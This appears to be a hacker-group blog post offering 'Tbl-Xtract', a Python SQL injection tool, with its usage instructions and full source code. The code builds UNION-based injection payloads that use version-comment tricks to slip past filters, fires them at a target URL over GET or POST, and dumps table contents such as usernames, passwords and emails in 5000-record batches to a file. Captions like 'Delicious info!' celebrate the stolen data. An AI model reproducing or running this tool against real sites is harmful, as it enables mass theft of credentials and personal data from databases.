MYSQL Db dump tool tbl-xtract

Tbl-Xtract is a script to dump huge databases Quickly . It can dump 5 thousand records in one request (Quite fast huh ? ) . It also supports Post SQLi and Custom limit . the default is 5 thousand . there’s also the handy –A for Apostrophe if required

• Usage

Using the script requires a bit of work in that u have to know the total columns .. the vulnerable column .. the table name and the columns to dump . Having all that info at hand you just run the script using

python –c Total_columns –v Vulnerable_column –t Table_Name –n column_names 

• Screenshots

^{Help text}

^{in Action}

^{Aha! The Dump File}

^{Delicious info!}

• Code

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167

#Table Extractor Script #Idea : Ch3rn0by1 #C0de : VIRkid fb.com/virkid36 # Greets to team Madleets #Beta version #Disclaimer : Author is not responsible for any illegal usage of the script ###################################   import urllib2,re,sys,urllib,argparse parser=argparse.ArgumentParser(description="Data Dumping utility ./VIRkid") parser.add_argument("Target",help="VULNERABLE url",type=str) parser.add_argument('-c','--columns',help="Total Number of Columns",type=int) parser.add_argument('-v','--vuln',help="Vulnerable Column",type=int) parser.add_argument('-t','--table',help="Table name to extract e.g tbl_admin",type=str) parser.add_argument('-n','--column_name',help="comma separated list of columns to extract e.g username,password,email",type=str) parser.add_argument('-A','--Apostrophe',help="set to y to add Apostrophe at the start of query ",type=str) parser.add_argument('-p','--POST',help="POST SQLi",type=str,default='GET') parser.add_argument('-L','--limit',help="Limit Multiples of 5 (5X)",type=int) args=parser.parse_args()   #Banner def banner():           print "\t\t*********************************************"     print "\t\t*                                           *"     print "\t\t*              Tbl Xtrcat                   *"                                           print "\t\t*              .:VIRkid:.                   *"     print "\t\t*       Usage: python script.py -help       *"     print "\t\t*     ali ahmady , pHaNtOm_X ,Ch3rn0by1     *"     print "\t\t*********************************************" #Column Generator       def colc(num):  comment="%23"  num+=1  cols=','.join([str(i) for i in xrange(1,num)])  return cols+comment   #Query Generator   def qry(cols_t,vulnerable_column,table_name,limits,columns,apos=0):     if apos=='y':       un="' and 0 /*!12345union*/ /*!12345select*/ "  else:   un=" and 0 /*!12345union*/ /*!12345select*/ "      t_columns=colc(cols_t)  t_columns=' '+t_columns  vcol=vulnerable_column     dios="make_set(6,@:=0x0a,(/*!12345select*/(1)/*!12345frOm*/(/*!12345select*/ * /*!12345frOm*/ %s limit %d,%d)shit /*!12345where*/@:=make_set(511,@,0x3c6c693e,%s)),@)"%(table_name,limits,5000,columns)  if cols_t==1 and vcol==1:   retq=t_columns.replace(' 1%23',dios+'%23')             elif vcol==1:   retq=t_columns.replace('%d,'%vcol,dios+',')          elif vcol==cols_t:   retq=t_columns.replace(',%d%%23'%vcol,','+dios+'%23')            else:   retq=t_columns.replace(',%d,'%vcol,','+dios+',')     furl=un+retq  furl=furl.replace(' ','+').replace("'",'%27')  print furl  return furl     #Record Extractor   def extractor(u,data):  recs=[]  req=urllib2.Request(u,data)  req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0')  f=urllib2.urlopen(req).read()  r=re.findall('<li>,.+..?',f)  if not r :   print "\n[+] Table exhausted"   sys.exit(0)  x=r[0].replace('<li>','').strip().replace('</div>','').split(',,',999999)     print "\n[+] Dumped : %d Records"%len(x)  for each in x:   each=each.replace(',','::')   recs.append(each+'\n')  return recs   try:  t_site=args.Target    #limit count  c=0  banner()  print "\n[*] Target : %s"%t_site #Dump File  dfname='dump-%s-%s-%s.txt'%(args.Target.replace("http://","").split("/",100)[0],args.table,args.column_name) # dfname="bigdump.txt"  print "\n[*] Dump File : ",dfname  dump_file=open(dfname,'w')    #GET injection  if args.POST=='GET':   while True:              data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)    u=t_site+data_dump   # print u    c+=5000        dump_file.writelines(extractor(u,None))    if args.limit:     if c>=args.limit:      print "\n[+] Limit Reached"      break   dump_file.close()      #POST Injection  elif args.POST!='GET':         while True:             data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)    u=t_site+data_dump    Pdata=args.POST    Pdata=Pdata.replace("Ij3ct",data_dump)      print u        dump_file.writelines(extractor(u,Pdata))    c+=5000    if args.limit:     if c>=args.limit:      print "\n[+] Limit Reached"      break    dump_file.close()   except TypeError:  print "\n[-] Invalid Values OR no values provided for REQUIRED arguments"   except urllib2.HTTPError, e:  print "\n[-] %s | Resource %s"%(e.code,e.msg)   except urllib2.URLError:  print "\n[-] Unable to Connect to Target"   except KeyboardInterrupt:  dump_file.close()    except IOError:  print "[-] Unable to Create dump file"